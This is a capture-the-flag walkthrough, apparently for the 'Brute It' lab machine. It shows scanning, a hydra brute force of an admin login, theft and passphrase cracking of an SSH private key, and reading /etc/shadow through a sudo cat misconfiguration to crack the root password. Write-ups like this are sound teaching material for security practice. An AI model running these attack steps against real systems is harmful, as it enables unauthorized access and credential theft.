Enumeration
Nmap
┌──(alen㉿kali)-[~/Downloads]
└─$ nmap -p- --min-rate 5000 10.10.110.235
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-06-11 22:26 +04
Nmap scan report for 10.10.110.235
Host is up (0.12s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 15.69 seconds
┌──(alen㉿kali)-[~/Downloads]
└─$ nmap -A -p 22,80 10.10.110.235
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-06-11 22:26 +04
Nmap scan report for 10.10.110.235
Host is up (0.12s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4b:0e:bf:14:fa:54:b3:5c:44:15:ed:b2:5d:a0:ac:8f (RSA)
| 256 d0:3a:81:55:13:5e:87:0c:e8:52:1e:cf:44:e0:3a:54 (ECDSA)
|_ 256 da:ce:79:e0:45:eb:17:25:ef:62:ac:98:f0:cf:bb:04 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X
OS CPE: cpe:/o:linux:linux_kernel:4.15
OS details: Linux 4.15
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 118.61 ms 10.14.0.1
2 119.55 ms 10.10.110.235
OS and Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 15.77 seconds
By doing nmap we can see that there are two ports which are open – ssh and http, let’s take a look at http website
It’s a typical apache website and looked at the source code and found nothing
let’s perform content discovery using gobuster
Gobuster
┌──(alen㉿kali)-[~/Downloads]
└─$ gobuster dir -u <http://10.10.110.235/> -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: <http://10.10.110.235/>
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/admin (Status: 301) [Size: 314] [--> <http://10.10.110.235/admin/>]
We found a webpage called as admin. Now let’s look at the page
We can see that it is a login page now let’s look at the source code
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="stylesheet" href="styles.css">
<title>Admin Login Page</title>
</head>
<body>
<div class="main">
<form action="" method="POST">
<h1>LOGIN</h1>
<label>USERNAME</label>
<input type="text" name="user">
<label>PASSWORD</label>
<input type="password" name="pass">
<button type="submit">LOGIN</button>
</form>
</div>
<!-- Hey john, if you do not remember, the username is admin -->
</body>
</html>
Here we can see that there is a comment saying that the username is admin and we have another potential username called as john.
One more thing to notice is that it is http post form so we can use hydra to bruteforce it
Hydra
When doing hydra you have to make sure that some points are noted the points are noted in the screenshot below
so user,pass are the input fields the location of the page is /admin/ make sure that you are putting the location correctly if you put only /admin it will not work and the error message as well
so use all the information that you have got to construct the hydra command
┌──(alen㉿kali)-[~/Downloads]
└─$ hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.110.235 http-post-form "/admin/:user=^USER^&pass=^PASS^:F=Username or password invalid"
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (<https://github.com/vanhauser-thc/thc-hydra>) starting at 2025-06-11 22:48:24
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://10.10.110.235:80/admin/:user=^USER^&pass=^PASS^:F=Username or password invalid
[80][http-post-form] host: 10.10.110.235 login: admin password: xavier
1 of 1 target successfully completed, 1 valid password found
Hydra (<https://github.com/vanhauser-thc/thc-hydra>) finished at 2025-06-11 22:48:51
We have got the password which is xavier
So we have got the message and message is indicating john to finish the development of the website and when you click on the link we can see the RSA Private key file
We can use wget to transfer the file and let’s take a look at the permissions as well
┌──(alen㉿kali)-[~/Downloads]
└─$ wget <http://10.10.110.235/admin/panel/id_rsa>
--2025-06-11 22:56:02-- <http://10.10.110.235/admin/panel/id_rsa>
Connecting to 10.10.110.235:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1766 (1.7K)
Saving to: ‘id_rsa’
id_rsa 100%[=============================================================================>] 1.72K --.-KB/s in 0s
2025-06-11 22:56:02 (110 MB/s) - ‘id_rsa’ saved [1766/1766]
┌──(alen㉿kali)-[~/Downloads]
└─$ ls -l | grep id_rsa
-rw-rw-r-- 1 alen alen 1766 Aug 17 2020 id_rsa
We can see that group and others can read the file so we have to change the permission using chmod
┌──(alen㉿kali)-[~/Downloads]
└─$ chmod 600 id_rsa Now let’s login to SSH using the private key
──(alen㉿kali)-[~/Downloads]
└─$ ssh john@10.10.110.235 -i id_rsa
The authenticity of host '10.10.110.235 (10.10.110.235)' can't be established.
ED25519 key fingerprint is SHA256:kuN3XXc+oPQAtiO0Gaw6lCV2oGx+hdAnqsj/7yfrGnM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.110.235' (ED25519) to the list of known hosts.
Enter passphrase for key 'id_rsa': Here we can see that they are asking for a passphrase but we don’t have a passphrase so we have to crack it.
We can crack it using john utilities called as ssh2john to convert the ssh private key into a hash and crack the hash using john
Using SSH2JOHN
┌──(alen㉿kali)-[~/Downloads]
└─$ ssh2john id_rsa > johnhash
┌──(alen㉿kali)-[~/Downloads]
└─$ john johnhash -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
rockinroll (id_rsa)
1g 0:00:00:00 DONE (2025-06-11 23:08) 5.555g/s 403377p/s 403377c/s 403377C/s saloni..rock14
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
We have got the passphrase now let’s using the passphrase to get ssh access
Shell as john
┌──(alen㉿kali)-[~/Downloads]
└─$ ssh john@10.10.110.235 -i id_rsa
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-118-generic x86_64)
* Documentation: <https://help.ubuntu.com>
* Management: <https://landscape.canonical.com>
* Support: <https://ubuntu.com/advantage>
System information as of Wed Jun 11 17:02:31 UTC 2025
System load: 0.0 Processes: 108
Usage of /: 25.7% of 19.56GB Users logged in: 0
Memory usage: 25% IP address for ens5: 10.10.110.235
Swap usage: 0%
63 packages can be updated.
0 updates are security updates.
Last login: Wed Sep 30 14:06:18 2020 from 192.168.1.106
john@bruteit:~$ ls
user.txt
john@bruteit:~$ cat user.txt
Now let’s check for sudo misconfigurations using sudo -l command
We have found that we can use cat as a root user using sudo
now let’s read the shadow file
Now let’s copy the hash of the root and crack it using john
┌──(alen㉿kali)-[~/Downloads]
└─$ nano roothash
┌──(alen㉿kali)-[~/Downloads]
└─$ john roothash -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
football (?)
1g 0:00:00:00 DONE (2025-06-11 23:20) 3.125g/s 1600p/s 1600c/s 1600C/s 123456..letmein
Use the "--show" option to display all of the cracked passwords reliably
Session completed. Now that we have the root password let’s switch user to root
Shell as root
john@bruteit:~$ su root
Password:
root@bruteit:/home/john# cd
root@bruteit:~# ls
root.txt
root@bruteit:~# cat root.txt
